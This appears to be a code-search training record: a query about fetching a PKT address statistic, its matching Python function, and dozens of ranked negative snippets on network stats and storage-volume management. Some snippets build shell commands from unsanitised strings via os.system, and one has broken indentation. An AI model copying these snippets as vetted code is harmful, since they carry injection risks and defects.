[ "0.61674994", "0.597512", "0.5870767", "0.58470446", "0.576566", "0.5624128", "0.560035", "0.5490663", "0.5485842", "0.54782003", "0.5429284", "0.53762597", "0.5370525", "0.53394765", "0.5291796", "0.52729493", "0.52668846", "0.5265301", "0.5239564", "0.5236908", "0.5234921", "0.5210103", "0.5208682", "0.5194724", "0.5193267", "0.5183489", "0.5175141", "0.51678973", "0.5164121", "0.5162699" ]
0.6441095
0
return the specific pkt statistic (int) of the given address (str) and name of stat (str)
def get_stat(address, stat): base_url = 'https://pkt.cash/api/v1/PKT/pkt/address/' request_url = base_url + address addrStats = url_to_dict(request_url) return int(addrStats[stat])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_stat(self, name: str) -> int:\n return self._mallctl(f\"stats.{name}\")", "def get_player_stats_name(self, player_name):\n status, data = self._get_player_game_stats(player_id=self._player_dict[player_name]['PlayerID'])\n return status, data.decode(\"utf-8\")", "def getShort(self, addr: ghidra.program.model.address.Address) -> int:\n ...", "def _name2idx(name):\n match = re.search(r\"eth(\\d+)\", name, re.I)\n if not match:\n raise exception.CloudbaseInitException(\n \"invalid NetworkDetails name {!r}\"\n .format(name)\n )\n return int(match.group(1))", "def portstatsshow(obj, content):\n global _portstats_to_api\n\n port_obj, port_stats_d, switch_obj = None, None, obj.r_switch_obj()\n\n for buf in content:\n buf = buf.replace('er_single_credit_loss', 'er_single_credit_loss ')\n buf = buf.replace('er_multi_credit_loss', 'er_multi_credit_loss ')\n buf = buf.replace('fec_corrected_rate', 'fec_corrected_rate ')\n buf = buf.replace('latency_dma_ts', 'latency_dma_ts ')\n tl = gen_util.remove_duplicate_char(buf.replace('\\t',' '), ' ').split(' ')\n if len(tl) < 2:\n continue\n\n if tl[0] == 'port:':\n port_obj = brcddb_port.port_obj_for_index(switch_obj, int(tl[1].strip()))\n if port_obj is None:\n brcdapi_log.exception('Could not find port matching: ' + buf, echo=False) # Just so it gets in the log\n raise Exception('Could not find port matching: ' + buf)\n port_stats_d = port_obj.r_get(brcdapi_util.stats_uri)\n if port_stats_d is None:\n port_stats_d = dict(name=port_obj.r_obj_key())\n port_obj.s_new_key(brcdapi_util.stats_uri, port_stats_d)\n\n elif tl[0] in _portstatsshow_special:\n _portstatsshow_special[tl[0]](port_obj)\n\n else:\n key = _portstats_to_api.get(tl[0])\n if key is not None:\n port_stats_d.update({key: int(tl[1])})", "def getShort(self, address: ghidra.program.model.address.Address) -> int:\n ...", "def read_lnet_stats(f):\n ret = {'send_count': 0, 'recv_count': 0, 'send_length':0, 'recv_length': 0}\n\n pfile = os.path.normpath(f) + \"/stats\"\n with open(pfile, \"r\") as f:\n for line in f:\n chopped = line.split()\n if chopped[3]:\n ret[\"send_count\"] = int(chopped[3])\n if chopped[4]:\n ret[\"recv_count\"] = int(chopped[4])\n if chopped[7]:\n ret[\"send_length\"] = int(chopped[7])\n\t\tif chopped[8]:\n\t\t ret[\"recv_length\"] = int(chopped[8])\t\n \n\n if ret['send_count'] == 0 and ret['recv_count'] == 0 and ret['send_length'] == 0 and ret['recv_length'] == 0 :\n return None\n\n return ret", "def _read_stats(self, name):\n if os.name == 'nt':\n name = asunicode(name)\n stats = os.stat(name)\n mode = oct(stats.st_mode)[-4:]\n size = stats.st_size\n atime = int(stats.st_atime)\n mtime = int(stats.st_mtime)\n return (mode, size, mtime, atime)", "def get_stats(stat_name: str, stat_year: str=\"1978\") -> str:\n fixed_name = stat_name.lower()\n\n if stat_year != '1978':\n output = _get_content(fixed_name, \"stats\", stat_year)\n else:\n output = _get_content(fixed_name, \"stats\")\n\n return output", "def parse_character_stat(raw_stat: str) -> int:\n pattern = r\"(\\d+)\"\n stat = re.search(pattern, raw_stat).group()\n\n return int(stat)", "def samtools_stats(filename):\n stats, err = Popen([\"samtools\",\"stats\",filename], stdout=PIPE, stderr=PIPE).communicate()\n if err != \"\":\n raise Exception(err)\n stats = [x.split(\"\\t\") for x in stats.split(\"\\n\")]\n chksum = [x for x in stats if x[0].startswith(\"CHK\")][0]\n stats = dict([(x[1].replace(\":\",\"\"),set_type(x[2]),) for x in stats if x[0].startswith(\"SN\")])\n stats[\"filename\"] = filename\n stats[\"chksum_read_names\"] = chksum[1]\n stats[\"chksum_sequences\"] = chksum[2]\n stats[\"chksum_qualities\"] = chksum[3]\n return stats", "def _getStatisticType(self, statistic):\n\n instructions = simplejson.loads(statistic.instructions_json)\n return instructions['type']", "def map_stat_name(self, generic_name):\n pass", "def get_kstat(descriptor, only_num=True, no_times=False, terse=False,\n ks_class=None, statlist=None, single_val=False):\n assert isinstance(descriptor, basestring)\n assert isinstance(only_num, bool)\n assert isinstance(no_times, bool)\n assert isinstance(terse, bool)\n\n if isinstance(statlist, basestring):\n statlist = [statlist]\n\n d = kstat_req_parse(descriptor)\n ret = {}\n\n if d['module']:\n ko = kstat.Kstat(d['module'])\n else:\n ko = kstat.Kstat()\n\n for mod, inst, name, kclass, ks_type, ksp in ko._iterksp():\n if d['instance'] is not None and inst != d['instance']:\n continue\n\n if d['name'] is not None and name != d['name']:\n continue\n\n if ks_class is not None and kclass != ks_class:\n continue\n\n astat = ko[mod, inst, name]\n\n for k, v in astat.items():\n if d['statistic'] is not None and k != d['statistic']:\n continue\n\n if statlist is not None and statlist != ['__all__'] and \\\n k not in statlist:\n continue\n if k == 'snaptime' or k == 'crtime':\n if no_times:\n continue\n v = long(v)\n if only_num:\n try:\n float(v)\n except:\n continue\n\n if single_val:\n return v\n\n k = k.lower().replace(' ', '_')\n\n if not terse:\n k = '%s:%d:%s:%s' % (mod, inst, name, k)\n ret[k] = v\n\n return ret", "def getProfile(self, name):\n SN = None\n for x in self.root.goto(\"CommonDataObjects/MeasurementOptions/*/massintervals\"):\n if x.name == 'mi':\n v = x.dictList()\n lab = v['assign']['utf16'] or v['desc']['utf16']\n if lab == name:\n SN = v['SN']['utf16']\n break\n if SN is None:\n raise Exception(\"Profile \\\"{}\\\" not found\".format(name))\n path = \"CommonDataObjects/DataViewCollection/*/dataSource/simsDataCache/{SN}/profile\".format(SN=SN)\n raw = self.root.goto(path, lazy=True).decompress()\n return struct.unpack(\"<\" + str(len(raw) // 8) + \"d\", raw)", "def net_if_stats():\n ret = {}\n rawdict = cext.net_if_stats()\n for name, items in rawdict.items():\n if not PY3:\n assert isinstance(name, unicode), type(name)\n name = py2_strencode(name)\n isup, duplex, speed, mtu = items\n if hasattr(_common, 'NicDuplex'):\n duplex = _common.NicDuplex(duplex)\n ret[name] = _common.snicstats(isup, duplex, speed, mtu, '')\n return ret", "def get_value(name):\n\n metrics = get_metrics()[0]\n\n name = name[len(NAME_PREFIX):] # remove prefix from name\n try:\n result = metrics['data'][name]\n except StandardError:\n result = 0\n\n return result", "def extract_stats(stat_list, prefix=\"\"):\n for stat in stat_list:\n data = stat.strip().split('\\n')\n value = data[0]\n\n # attempt to convert to number, and deal\n # with using 'k' as an abbreviation to 1000.\n try:\n if value[-1] == 'k':\n value = float(value[:-1])*1000\n else:\n value = float(value)\n except ValueError:\n pass\n\n name = prefix + data[1].replace(' ', '_')\n profile[name] = value", "def getSymbolAt(self, address: ghidra.program.model.address.Address, name: unicode) -> ghidra.program.model.symbol.Symbol:\n ...", "def rpc_getaddressinfo(self, address: str) -> dict:\n return self._call_command([\"getaddressinfo\", address])", "def get_stats(name):\n\n return get_component(CachingPackage.COMPONENT_NAME).get_stats(name)", "def _parse_addr(self, addr: str):\n addr = addr.upper()\n return self._registers_list.get(addr, None)", "def _request_stats(self, datapath):\n self.logger.debug('send stats request: %016x', datapath.id)\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPPortDescStatsRequest(datapath, 0)\n datapath.send_msg(req)\n\n req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n datapath.send_msg(req)\n\n req = parser.OFPFlowStatsRequest(datapath)\n datapath.send_msg(req)", "def packetSniff():\n\n packets = psutil.net_io_counters(pernic=True)\n interfaces = {}\n x = 0\n for p in packets.items():\n values = {}\n values['name'] = p[0]\n values['bytes_sent'] = p[1][0]\n values['bytes_recv'] = p[1][1]\n values['pckt_sent'] = p[1][2]\n values['pckt_recv'] = p[1][3]\n values['errin'] = p[1][4]\n values['errout'] = p[1][5]\n values['dropin'] = p[1][6]\n values['dropout'] = p[1][7]\n\n if ((values['bytes_sent'] or values['bytes_recv'] or\n values['pckt_sent'] or values['pckt_recv']) != 0):\n\n interfaces[x] = values\n x += 1\n else:\n pass\n\n return interfaces", "def lookup_socket(self, address): # TODO: optimize me\n\n net_tuple = self.read_nodestate(0)\n for item in net_tuple:\n discovered_address = item[1]\n if address == discovered_address:\n return item[0]", "def current_stat(self, stat: Stat) -> int:\n return self.stats[stat]", "def get_mgmt_addr(ssx_name=\"none\"): \n\n\n cmd=\"nslookup %s >> mgmt.txt\" %(ssx_name)\n os.system(cmd)\n fileptr=file(\"mgmt.txt\",\"r\")\n outputstr=fileptr.read()\n regex=re.compile('\\nAddress:(\\s+)(\\d+).(\\d+).(\\d+).(\\d+)\\n')\n regex1=re.compile('(\\d+)..(\\d+).(\\d+).(\\d+)')\n found=regex.search(outputstr)\n found1=regex1.search(found.group())\n return found1.group()", "def get_stat(self, stat_type):\n result_stat = 0\n stat_list = self.log_book[stat_type]\n if len(stat_list) != 0:\n result_stat = np.mean(stat_list)\n result_stat = np.round(result_stat, 4)\n return result_stat", "def _get_openvpn_stats(path=\"/var/run/openvpn/server-0.sock\"):\n try:\n logging.debug(\"Getting metrics from %s\", path)\n with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:\n sock.connect(path)\n sock.send(b\"load-stats\\n\")\n sock.setblocking(0)\n\n ready = select.select([sock], [], [], 5.0)\n if ready[0]:\n data = sock.recv(4096)\n if not data:\n logging.debug(\"No result?\")\n return 0\n data = data.decode('utf-8')\n logging.debug(\"Received %s\", data)\n data_match = re.search(r'nclients=(\\d+)', data)\n logging.debug(\"pattern match result %s\", data_match)\n if data_match:\n logging.debug(\"%s connections\", data_match.group(1))\n return int(data_match.group(1))\n except Exception as exc:\n logging.debug(\"Error gathering openvpn stats: %s\", exc)\n\n return 0", "def status(cls, stat, request=Retrieve):\n res = cls.STATUS_MAP.get(stat)\n if res is None:\n res = status.Status('%d.00' % (stat // 100))\n if res.success:\n res = request.success\n return res" ]
[ "0.66505015", "0.5510597", "0.5497371", "0.5400981", "0.5397578", "0.538371", "0.52910346", "0.52851224", "0.5273926", "0.5184255", "0.51780534", "0.51542836", "0.51154304", "0.51121444", "0.51022923", "0.50941217", "0.50751036", "0.5028282", "0.5005922", "0.49972942", "0.49870563", "0.49711207", "0.49637112", "0.4929783", "0.4927736", "0.4917471", "0.49109522", "0.49053782", "0.49053696", "0.49013513" ]
0.83788157
0
Convenience method that round input to valid ScaleIO Volume size (8GB increments)
def is_valid_volsize(self,volsize): if type(volsize) is int: size_temp = divmod(volsize, 8192) if size_temp[1] > 0: # If not on 8GB boundary return int((1 + size_temp[0]) * 8192) # Always round to next 8GB increment else: return int(volsize)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ensure_size(value):\n return int(round(value * 1.0 / base)) * base", "def round_volume(volume, ndigits):\n return ul(round(volume.to('microliter').magnitude,ndigits))", "def convertFromBytes(size, unit):\n\tif (unit == 'kb'):\n\t\treturn size / 10000\n\telif (unit == 'mb'):\n\t\treturn size / 1000000\n\telif (size == 'gb'):\n\t\treturn size / 1000000000", "def ceil_volume(volume,ndigits=0):\n \n magnitude = volume.to('microliter').magnitude\n power_multiple = math.pow(10,ndigits)\n return ul(math.ceil(magnitude * int(power_multiple)) / power_multiple)", "def volume_size(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"volume_size\")", "def volume_size(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"volume_size\")", "def volume_size(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"volume_size\")", "def size_in_mb(size_in_bytes):\n if size_in_bytes < 10**6:\n return size_in_bytes // 1000\n else:\n return size_in_bytes // 10**6", "def __convert_file_size(self, file_size:float)->float:\n return file_size * 1000000", "def convert_unit(size_in_bytes, unit):\n if unit == 'KB':\n return size_in_bytes/1024\n elif unit == 'MB':\n return size_in_bytes/(1024*1024)\n elif unit == 'GB':\n return size_in_bytes/(1024*1024*1024)\n else:\n return size_in_bytes", "def fix_size(value):\n try:\n obj_size = int(float(value) * wx.GetApp().settings.size_coeff)\n except AttributeError:\n obj_size = int(value)\n return obj_size", "def storage_size_to_kb(self,storage_size):\n multiplier = 1\n val = float(storage_size[0:-2])\n meter = storage_size[-2:]\n if \"kb\" == meter:\n multiplier = 1\n elif \"mb\" == meter:\n multiplier = 1024\n elif \"gb\" == meter:\n multiplier = 1024*1024\n return val*multiplier", "def filter_storage_size_num(size_str):\n\n # pattern: '^[1-9][\\d\\.]*[MGT]B?$', multiplier=1000 (not KiB)\n if size_str.endswith('B'):\n size_str = size_str[:-1]\n try:\n size_num = 1000000\n for multiplier in ['M', 'G', 'T']:\n if size_str.endswith(multiplier):\n return '{:.2f}'.format(size_num * float(size_str[:-1]))\n size_num = size_num * 1000\n return '{:.2f}'.format(float(size_str))\n except ValueError as ex:\n logging.error(size_str + \" is not a valid size string\")\n raise", "def _parseDiskSize(self, diskSizeParam): \\\n # pylint: disable=no-self-use\n if diskSizeParam.endswith('TB'):\n return int(float(diskSizeParam[:-2]) * 1000000)\n\n if diskSizeParam.endswith('GB'):\n return int(float(diskSizeParam[:-2]) * 1000)\n elif diskSizeParam.endswith('MB'):\n # Must be an integer\n return int(diskSizeParam[:-2])\n\n return int(diskSizeParam)", "def volume_size(self) -> Optional[int]:\n return pulumi.get(self, \"volume_size\")", "def volume_size(self) -> Optional[int]:\n return pulumi.get(self, \"volume_size\")", "def _disk_size_in_gb(_string):\n try:\n value = int(_string)\n except ValueError as e:\n raise argparse.ArgumentTypeError(str(e))\n if value <= 0:\n raise argparse.ArgumentTypeError('Size must be positive value')\n return value", "def floor_volume(volume):\n return ul(math.floor(volume.to('microliter').magnitude))", "def size_to_gb(self, value):\n nb = re.search(\"[0-9]+\", value)\n if nb:\n nb = int(re.search(\"[0-9]+\", value).group())\n else:\n return 0\n if \"MB\" in value:\n return nb / 1024 if nb else 0\n elif \"GB\" in value:\n return nb\n else:\n return 0", "def baseSize_convert(baseSize_string): \r\n # Convert input genome size to int\r\n if baseSize_string[-1].upper() == 'K':\r\n baseSize = float(baseSize_string[0:-1]) * 1000\r\n elif baseSize_string[-1].upper() == 'M':\r\n baseSize = float(baseSize_string[0:-1]) * 1000000\r\n elif baseSize_string[-1].upper() == 'G':\r\n baseSize = float(baseSize_string[0:-1]) * 1000000000\r\n else:\r\n baseSize = float(baseSize)\r\n \r\n return int(baseSize)", "def _fromBytes(self, size, unity):\n size_map = {'B': 1, 'KB': 1024, 'MB': 1024 ** 2, 'GB': 1024 ** 3,\n 'TB': 1024 ** 4}\n return size / size_map[unity]", "def size(self, new_size):\n if type(new_size) is str:\n new_size = new_size.replace(\" \", \"\").upper()\n new_size = new_size.replace(\")\", \"\")\n new_size = new_size.replace(\"(\", \"\")\n new_size = new_size.replace(\",\", \".\")\n new_size = new_size.replace(\"B\", \"\").strip()\n target_unit = None\n multiplier = 1\n is_bytes = False\n try:\n float(new_size)\n target_unit = \"B\"\n is_bytes = True\n except Exception as e:\n pass\n\n if not is_bytes:\n multiplier *= 1024\n for unit in [\"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\", \"Y\"]:\n if not target_unit and unit in new_size:\n target_unit = unit\n multiplier *= 1024\n # Reject double units\n elif target_unit and unit in new_size:\n target_unit = None\n break\n\n if target_unit:\n new_size = new_size.replace(target_unit, \"\").strip()\n try:\n self._size = int(float(new_size) * multiplier)\n except Exception as e:\n logger.error(f\"Failed to set a size from \\\"{new_size}\\\"\")\n logger.error(e)\n\n elif type(new_size) is int:\n self._size = new_size\n\n else:\n raise Exception(\"Wrong size type provided ({type(new_size)})\")\n\n if not self._size:\n logger.warn(f\"Failed to set a size from \\\"{new_size}\\\"\")", "def bytes_to_size(size):\n if not size >> 10 or size < 0:\n return str(size)\n elif not size >> 20:\n return '{:.2f}KB'.format(size / 1024.0)\n elif not size >> 30:\n return '{:.2f}MB'.format(size / (1024.0 ** 2))\n elif not size >> 40:\n return '{:.2f}GB'.format(size / (1024.0 ** 3))\n else:\n return '{:.2f}TB'.format(size / (1024.0 ** 4))", "def parse_size(size,b=1024,u='B',pre=['']+[p for p in'KMGTPEZY']):\n intsize, unit = extract_num_unit(size)\n\n # Account for 10B vs 10KB when looking for base\n if len(unit) == len(u):\n base = unit\n else:\n base = unit[1:]\n\n # Check if we know this unit's base, otherwise use default\n if base in unit_base:\n b = unit_base[base]\n pow = { k+base:v for v, k in enumerate(pre) }\n\n return float(intsize)*(b**pow[unit])", "def clean_size(size):\n size = size.replace(\"M\",\"\")\n if size.endswith(\"k\"):\n size = float(size[:-1])/1000\n elif size == \"Varies with device\":\n size = np.NaN\n else:\n size = float(size)\n return size", "def format_size(size):\n size = float(size)\n for unit in ['bit','Kibit','Mibit','Gibit']:\n if size < 1024.0:\n return \"{size:3.2f}{unit}\".format(size=size, unit=unit)\n size /= 1024.0\n return \"{size:.2f}{unit}\".format(size=size, unit='TiB')", "def _SizeCalculator(partition_size):\n # Max image size grows less than partition size, which means\n # footer size grows faster than partition size.\n return int(math.pow(partition_size, 0.95))", "def bytesto(self, bytes, to, bsize=1024):\n a = {'k': 1, 'm': 2, 'g': 3, 't': 4, 'p': 5, 'e': 6}\n r = float(bytes)\n for i in range(a[to]):\n r = r / bsize\n r = round(r, 1)\n return(r)", "def get_size(size):\n if size.isdigit():\n return int(size)\n\n def do_get_size(num, unit):\n u = units[unit]\n if num.find('.') == -1:\n return int(num) * u\n return int(float(num) * u)\n\n s = size.strip().upper()\n if s.find(' ') == -1:\n num, unit = re.sub(r\"([\\d.]+)\", r\"\\1 \", s).split()\n else:\n num, unit = s.split()\n\n try:\n return do_get_size(num, unit)\n except KeyError:\n\traise Exception('unknown size unit[%s]' % size)", "def parse_size(size_str):\n try:\n return int(size_str)\n except ValueError, e:\n pass\n\n try:\n num = int(size_str[:-1])\n except ValueError, e:\n raise VMBuilderUserError(\"Invalid size: %s\" % size_str)\n\n if size_str[-1:] == 'g' or size_str[-1:] == 'G':\n return num * 1024\n if size_str[-1:] == 'm' or size_str[-1:] == 'M':\n return num\n if size_str[-1:] == 'k' or size_str[-1:] == 'K':\n return num / 1024" ]
[ "0.6768083", "0.6544661", "0.6347236", "0.6286869", "0.628502", "0.628502", "0.628502", "0.62824434", "0.6250458", "0.61724716", "0.6168352", "0.6118886", "0.6084759", "0.6077484", "0.60627866", "0.60627866", "0.6033113", "0.5994688", "0.5991111", "0.59894925", "0.59884065", "0.59538424", "0.5935738", "0.59067076", "0.58978975", "0.5856839", "0.5854483", "0.58380264", "0.5828038", "0.57961303" ]
0.6986386
0
removeMode = 'ONLY_ME' | 'INCLUDING_DESCENDANTS' | 'DESCENDANTS_ONLY' | 'WHOLE_VTREE' Using kwargs it will be possible to tell delete_volume() to unmap all SDCs before delting. Not working yet
def delete_volume(self, volObj, removeMode='ONLY_ME', **kwargs): if kwargs: for key, value in kwargs.iteritems(): if key =='autoUnmap' and value ==True: # Find all mapped SDS to this volObj # Call unmap for all of them if self.get_volume_all_sdcs_mapped(volObj): try: self.conn.cluster.unmap_volume_from_sdc(volObj, enableMapAllSdcs=False) except: raise RuntimeError("delete_volume() - enableMapAllSdcs error") else: # All SDS not enabled so loop through all mapped SDCs of volume and remove one by one for sdc in self.get_sdc_for_volume(volObj): try: self.unmap_volume_from_sdc(volObj, self.get_sdc_by_id(sdc['sdcId'])) except: raise RuntimeError("delete_volume() - unmap_volume_from_sdc() error") # TODO: # Check if object parameters are the correct ones, otherwise throw error self.conn.connection._check_login() deleteVolumeDict = {'removeMode': removeMode} try: response = self.conn.connection._do_post("{}/{}{}/{}".format(self.conn.connection._api_url, "instances/Volume::", volObj.id, 'action/removeVolume'), json=deleteVolumeDict) except: raise RuntimeError("delete_volume() - Communication error with ScaleIO Gateway") return response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_export(self, context, volume):\n pass", "def delete(self):\n for lv in self.logical_volumes:\n self.delete_lv(lv_name=lv)\n\n super().delete()", "def test_aws_service_api_volume_delete(self):\n pass", "def snap_remove(packages, *flags):\n if type(packages) is not list:\n packages = [packages]\n\n flags = list(flags)\n\n message = 'Removing snap(s) \"%s\"' % ', '.join(packages)\n if flags:\n message += ' with options \"%s\"' % ', '.join(flags)\n\n log(message, level='INFO')\n return _snap_exec(['remove'] + flags + packages)", "def rm(args):\n args.delete = True\n return remove(args)", "def removeOnDestroy(call, args=(), kwargs={}, nodeClass='*'):\n pass", "def test_delete_volume_failure_modes(self):\n ctxt = context.get_admin_context()\n extra_specs = {}\n type_ref = volume_types.create(ctxt, 'hgst-1', extra_specs)\n volume = {'id': '1', 'name': 'volume1',\n 'display_name': '',\n 'volume_type_id': type_ref['id'],\n 'size': 10,\n 'provider_id': 'volume10'}\n self._fail_space_delete = True\n # This should not throw an exception, space-delete failure not problem\n self.driver.delete_volume(volume)\n self._fail_space_delete = False\n volume['provider_id'] = None\n # This should also not throw an exception\n self.driver.delete_volume(volume)", "def delete_volume(self, context, volume_id, unmanage_only=False):\n context = context.elevated()\n\n volume_ref = self.db.volume_get(context, volume_id)\n\n if context.project_id != volume_ref['project_id']:\n project_id = volume_ref['project_id']\n else:\n project_id = context.project_id\n\n LOG.info(_(\"volume %s: deleting\"), volume_ref['id'])\n if volume_ref['attach_status'] == \"attached\":\n # Volume is still attached, need to detach first\n raise exception.VolumeAttached(volume_id=volume_id)\n\n self._notify_about_volume_usage(context, volume_ref, \"delete.start\")\n self._reset_stats()\n\n try:\n self._delete_cascaded_volume(context, volume_id)\n except Exception:\n LOG.exception(_(\"Failed to deleting volume\"))\n # Get reservations\n try:\n reserve_opts = {'volumes': -1, 'gigabytes': -volume_ref['size']}\n QUOTAS.add_volume_type_opts(context,\n reserve_opts,\n volume_ref.get('volume_type_id'))\n reservations = QUOTAS.reserve(context,\n project_id=project_id,\n **reserve_opts)\n except Exception:\n reservations = None\n LOG.exception(_(\"Failed to update usages deleting volume\"))\n\n # Delete glance metadata if it exists\n try:\n self.db.volume_glance_metadata_delete_by_volume(context, volume_id)\n LOG.debug(_(\"volume %s: glance metadata deleted\"),\n volume_ref['id'])\n except exception.GlanceMetadataNotFound:\n LOG.debug(_(\"no glance metadata found for volume %s\"),\n volume_ref['id'])\n\n self.db.volume_destroy(context, volume_id)\n LOG.info(_(\"volume %s: deleted successfully\"), volume_ref['id'])\n self._notify_about_volume_usage(context, volume_ref, \"delete.end\")\n\n # Commit the reservations\n if reservations:\n QUOTAS.commit(context, reservations, project_id=project_id)\n\n self.publish_service_capabilities(context)\n\n return True", "def delete_volume(self, uid):\n try:\n volInfo = self.get_volume_info(uid)\n except SVCVolumeNotFound as ex:\n LOG.warn(_(\"No volume with UID %s found.\") % uid)\n # assume deleted if not found\n return\n\n volID = volInfo.get(SVC_KEY_VDISK_ID)\n self.remove_fcmapping(uid)\n cmd = \"svctask rmvdisk -force %s\" % (volID)\n self._svc_command(cmd)", "def delete(self, name):\n result = self.cm.find_name(name)\n path = result[0]['path']\n delete_path = Path(f'{path}/{name}')\n try:\n os.system(f\"rmdir {delete_path}\")\n result[0]['State'] = 'deleted'\n result = self.update_dict(result)\n except:\n Console.error(\"volume is either not empty or not exist\")\n return result", "def removeControl(*args):", "def removeControl(*args):", "def removeControl(*args):", "def removeControl(*args):", "def destroy(self, log_level=''):\n # Get all the additional volumes and detach,delete.\n volumes = self.utils.get_volumes_with_tag(\n {'cluster_name': config.ENV_DATA['cluster_name']}\n )\n self.flexy_instance.destroy()\n self.utils.detach_and_delete_vols(volumes)", "def do_delete_configured_volume(self, arg):\n args = self.parse_arguments(arg)\n if len(args) == 0:\n self.perror(\"No storage specified.\")\n return\n self.do_coroutine(self._localStorageRoutines.delete_configured_volume_routine(args[0]))", "def remove_kernel(self, kernel_id):", "def main_remove(args):\n return remove_command(args.directory, args.name)", "def database_volume_delete(volume_uuid):\n db = database_get()\n session = db.session()\n query = session.query(model.Volume)\n query.filter(model.Volume.uuid == volume_uuid).delete()\n session.commit()", "def test_delete_volume(self):\n ctxt = context.get_admin_context()\n extra_specs = {}\n type_ref = volume_types.create(ctxt, 'hgst-1', extra_specs)\n volume = {'id': '1', 'name': 'volume1',\n 'display_name': '',\n 'volume_type_id': type_ref['id'],\n 'size': 10,\n 'provider_id': 'volume10'}\n self.driver.delete_volume(volume)\n expected = {'name': 'volume10'}\n self.assertDictMatch(expected, self.deleted)", "def svn_fs_delete_berkeley(*args):\r\n return _fs.svn_fs_delete_berkeley(*args)", "def snap_delete_by_volumename(mnode, volname):\n\n cmd = \"gluster snapshot delete volume %s --mode=script\" % volname\n return g.run(mnode, cmd)", "def remove_volume_letters(keep=None):\n if not keep:\n keep = ''\n\n script = []\n for vol in get_volumes():\n if vol['Letter'].upper() != keep.upper():\n script.append('select volume {}'.format(vol['Number']))\n script.append('remove noerr')\n\n # Run script\n try:\n run_diskpart(script)\n except subprocess.CalledProcessError:\n pass", "def do_command(self, args):\n ostypeops = dbops.OsTypes()\n ostypeops.delete(args)", "def remove():", "def delete_volumes(volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n for volume in volumes:\n command = 'cinder delete %s' % volume['id']\n a = Popen(command.split(), stdout=STDOUT, stderr=STDERR).communicate()[0]", "def delete_volumeaccessright_record( vac ):\n \n principal_id = vac.owner_id.email \n volume_name = vac.volume.name \n \n try:\n observer_core.ensure_volume_access_right_absent( principal_id, volume_name )\n except Exception, e:\n traceback.print_exc()\n logger.error(\"Failed to revoke access from %s to %s\" % (principal_id, volume_name))\n raise e\n \n return True", "def purge_volume(self, volume_path, data_isolated=False):\n\n trash = os.path.join(self.volume_prefix, \"_deleting\")\n trashed_volume = os.path.join(trash, volume_path.volume_id)\n\n try:\n self.fs.stat(trashed_volume)\n except cephfs.ObjectNotFound:\n log.warning(\"Trying to purge volume '{0}' but it's already been purged\".format(\n trashed_volume))\n return\n\n def rmtree(root_path):\n log.debug(\"rmtree {0}\".format(root_path))\n dir_handle = self.fs.opendir(root_path)\n d = self.fs.readdir(dir_handle)\n while d:\n if d.d_name not in [\".\", \"..\"]:\n # Do not use os.path.join because it is sensitive\n # to string encoding, we just pass through dnames\n # as byte arrays\n d_full = \"{0}/{1}\".format(root_path, d.d_name)\n if d.is_dir():\n rmtree(d_full)\n else:\n self.fs.unlink(d_full)\n\n d = self.fs.readdir(dir_handle)\n self.fs.closedir(dir_handle)\n\n self.fs.rmdir(root_path)\n\n rmtree(trashed_volume)\n\n if data_isolated:\n pool_name = \"{0}{1}\".format(self.POOL_PREFIX, volume_path.volume_id)\n osd_map = self._rados_command(\"osd dump\", {})\n pool_id = self._get_pool_id(osd_map, pool_name)\n mds_map = self._rados_command(\"mds dump\", {})\n if pool_id in mds_map['data_pools']:\n self._rados_command(\"mds remove_data_pool\", {\n 'pool': pool_name\n })\n self._rados_command(\"osd pool delete\",\n {\n \"pool\": pool_name,\n \"pool2\": pool_name,\n \"sure\": \"--yes-i-really-really-mean-it\"\n })", "def _deauthorize(self, volume_path, auth_id):\n client_entity = \"client.{0}\".format(auth_id)\n path = self._get_path(volume_path)\n pool_name = self._get_ancestor_xattr(path, \"ceph.dir.layout.pool\")\n try:\n namespace = self.fs.getxattr(path, \"ceph.dir.layout.pool_\"\n \"namespace\").decode()\n except cephfs.NoData:\n namespace = None\n\n # The auth_id might have read-only or read-write mount access for the\n # volume path.\n access_levels = ('r', 'rw')\n want_mds_caps = ['allow {0} path={1}'.format(access_level, path)\n for access_level in access_levels]\n if namespace:\n want_osd_caps = ['allow {0} pool={1} namespace={2}'.format(access_level, pool_name, namespace)\n for access_level in access_levels]\n else:\n want_osd_caps = ['allow {0} pool={1}'.format(access_level, pool_name)\n for access_level in access_levels]\n\n\n try:\n existing = self._rados_command(\n 'auth get',\n {\n 'entity': client_entity\n }\n )\n\n def cap_remove(orig_mds_caps, orig_osd_caps, want_mds_caps, want_osd_caps):\n mds_cap_tokens = orig_mds_caps.split(\",\")\n osd_cap_tokens = orig_osd_caps.split(\",\")\n\n for want_mds_cap, want_osd_cap in zip(want_mds_caps, want_osd_caps):\n if want_mds_cap in mds_cap_tokens:\n mds_cap_tokens.remove(want_mds_cap)\n osd_cap_tokens.remove(want_osd_cap)\n break\n\n return \",\".join(mds_cap_tokens), \",\".join(osd_cap_tokens)\n\n cap = existing[0]\n orig_mds_caps = cap['caps'].get('mds', \"\")\n orig_osd_caps = cap['caps'].get('osd', \"\")\n mds_cap_str, osd_cap_str = cap_remove(orig_mds_caps, orig_osd_caps,\n want_mds_caps, want_osd_caps)\n\n if not mds_cap_str:\n self._rados_command('auth del', {'entity': client_entity}, decode=False)\n else:\n self._rados_command(\n 'auth caps',\n {\n 'entity': client_entity,\n 'caps': [\n 'mds', mds_cap_str,\n 'osd', osd_cap_str,\n 'mon', cap['caps'].get('mon', 'allow r')]\n })\n\n # FIXME: rados raising Error instead of ObjectNotFound in auth get failure\n except rados.Error:\n # Already gone, great.\n return", "def remove(self, mount_point, delete_vols=False, detach=True):\n log.debug(\"Removing volume-based FS @ mount point {0} (delete_vols: \"\n \"{1}; detach: {2})\".format(mount_point, delete_vols, detach))\n self.unmount(mount_point)\n if detach:\n log.debug(\"Detaching volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if 